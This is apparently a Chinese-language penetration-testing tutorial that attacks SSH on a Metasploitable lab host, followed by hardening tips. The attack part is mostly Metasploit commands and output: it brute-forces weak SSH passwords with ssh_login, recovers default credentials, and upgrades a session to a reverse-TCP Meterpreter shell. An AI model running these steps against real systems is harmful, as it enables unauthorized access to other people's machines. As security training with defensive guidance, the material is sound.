Metasploit实战：SSH漏洞攻击

SSH弱口令破解

如果在设置SSH服务时，管理员设置了容易被猜解出来的用户名和密码（弱口令）。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令。破解出来就可以使用对应的用户名和密码登录系统。

下面使用msfconsole对ssh弱口令进行破解：

1、登录msfconsole

➜  ~ msfconsole

2、查找对应模块

msf5 > search -S auxiliary ssh

Matching Modules
================

   Name                                                        Disclosure Date  Rank       Check  Description
   ----                                                        ---------------  ----       -----  -----------
   auxiliary/dos/windows/ssh/sysax_sshd_kexchange              2013-03-17       normal     No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                                    normal     No     SSH Key Exchange Init Corruption
   auxiliary/fuzzers/ssh/ssh_version_15                                         normal     No     SSH 1.5 Version Fuzzer
   auxiliary/fuzzers/ssh/ssh_version_2                                          normal     No     SSH 2.0 Version Fuzzer
   auxiliary/fuzzers/ssh/ssh_version_corrupt                                    normal     No     SSH Version Corruption
   auxiliary/scanner/http/cisco_firepower_login                                 normal     Yes    Cisco Firepower Management Console 6.0 Login
   auxiliary/scanner/http/gitlab_user_enum                     2014-11-21       normal     Yes    GitLab User Enumeration
   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     Yes    Apache Karaf Default Credentials Command Execution
   auxiliary/scanner/ssh/cerberus_sftp_enumusers               2014-05-27       normal     Yes    Cerberus FTP Server SFTP Username Enumeration
   auxiliary/scanner/ssh/detect_kippo                                           normal     Yes    Kippo SSH Honeypot Detector
   auxiliary/scanner/ssh/eaton_xpert_backdoor                  2018-07-18       normal     Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
   auxiliary/scanner/ssh/fortinet_backdoor                     2016-01-09       normal     Yes    Fortinet SSH Backdoor Scanner
   auxiliary/scanner/ssh/juniper_backdoor                      2015-12-20       normal     Yes    Juniper SSH Backdoor Scanner
   auxiliary/scanner/ssh/karaf_login                                            normal     Yes    Apache Karaf Login Utility
   auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     Yes    libssh Authentication Bypass Scanner
   auxiliary/scanner/ssh/ssh_enumusers                                          normal     Yes    SSH Username Enumeration
   auxiliary/scanner/ssh/ssh_identify_pubkeys                                   normal     Yes    SSH Public Key Acceptance Scanner
   auxiliary/scanner/ssh/ssh_login                                              normal     Yes    SSH Login Check Scanner
   auxiliary/scanner/ssh/ssh_login_pubkey                                       normal     Yes    SSH Public Key Login Scanner
   auxiliary/scanner/ssh/ssh_version                                            normal     Yes    SSH Version Scanner

3、选择对应模块，并设置参数：

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                                         Required  Description
   ----              ---------------                                         --------  -----------
   BLANK_PASSWORDS   false                                                   no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                       yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                   no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                   no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                   no        Add all users in the current database to the list
   PASSWORD                                                                  no        A specific password to authenticate with
   PASS_FILE                                                                 no        File containing passwords, one per line
   RHOSTS            10.0.2.5                                                yes       The target address range or CIDR identifier
   RPORT             22                                                      yes       The target port
   STOP_ON_SUCCESS   false                                                   yes       Stop guessing when a credential works for a host
   THREADS           1                                                       yes       The number of concurrent threads
   USERNAME                                                                  no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/wordlists/metasploit/piata_ssh_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                   no        Try the username as the password for all users
   USER_FILE                                                                 no        File containing usernames, one per line
   VERBOSE           false                                                   yes       Whether to print output for all attempts

4、执行暴力破解

msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 10.0.2.5:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.2.12:42799 -> 10.0.2.5:22) at 2019-07-09 10:05:04 -0400
[+] 10.0.2.5:22 - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.2.12:41479 -> 10.0.2.5:22) at 2019-07-09 10:07:31 -0400
[+] 10.0.2.5:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.2.12:37033 -> 10.0.2.5:22) at 2019-07-09 10:32:43 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf5 auxiliary(scanner/ssh/ssh_login) > pwd
[*] exec: pwd

/root

重注payload，获取Meterpreter Shell

1、切换登录用户

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l

Active sessions
===============

  Id  Name  Type         Information                          Connection
  --  ----  ----         -----------                          ----------
  2         shell linux  SSH postgres:postgres (10.0.2.5:22)  10.0.2.12:41479 -> 10.0.2.5:22 (10.0.2.5)
  3         shell linux  SSH msfadmin:msfadmin (10.0.2.5:22)  10.0.2.12:37033 -> 10.0.2.5:22 (10.0.2.5)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

whoami
user

2、获取Meterpreter Shell

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]

[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.0.2.12:4433 
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 4 opened (10.0.2.12:4433 -> 10.0.2.5:37897) at 2019-07-09 11:25:08 -0400
[*] Command stager progress: 100.00% (773/773 bytes)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                            Connection
  --  ----  ----                   -----------                                                            ----------
  2         shell linux            SSH postgres:postgres (10.0.2.5:22)                                    10.0.2.12:41479 -> 10.0.2.5:22 (10.0.2.5)
  4         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ metasploitable.localdomain  10.0.2.12:4433 -> 10.0.2.5:37897 (10.0.2.5)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

SSH漏洞攻击防范指南

SSH 修改默认端口

默认情况下，SSH使用22端口。为了安全，一般情况下都会修改默认端口。修改之后必须重新启动SSH服务。

修改SSH默认端口

SSH 设置PGP登录

默认情况下，SSH使用用户名和密码进行远程登录。但也可以使用密钥对进行身份验证登录（公钥与私钥）。

生成SSH密钥对，使用puttygen。下载链接：https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

生成SSH密钥对

使用 ssh-keygen 命令在Linux生成.ssh目录，在.ssh下新建密钥存储文件authorized_keys，并复制私钥文件到.ssh目录下。使用命令 puttygen -L “拷贝私钥文件” ，将内容拷贝到authorized_keys文件中。

使用 ssh-keygen 命令在Linux生成.ssh目录

使用命令 puttygen -L

使用Putty客户端加载私钥文件进行连接。

使用Putty客户端加载私钥文件进行连接

SSH 防御暴力破解用户账号

在Linux下可以配置不能使用用户名和密码登录，只使用SSH PGP方式验证登录。规避了SSH暴力破解。但是，不能使用用户密码登录，很大程度上存在复杂操作。

SSH 防御暴力破解用户账号g

Iptables设置阈值防止暴力破解
利用Iptables对多次连接验证错误，进行账户锁定120秒。在设置完之后，需要重新启动ssh服务。

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent  --update --seconds 120 --hitcount 3 -j DROP

推荐汇总贴：漏洞利用套路汇总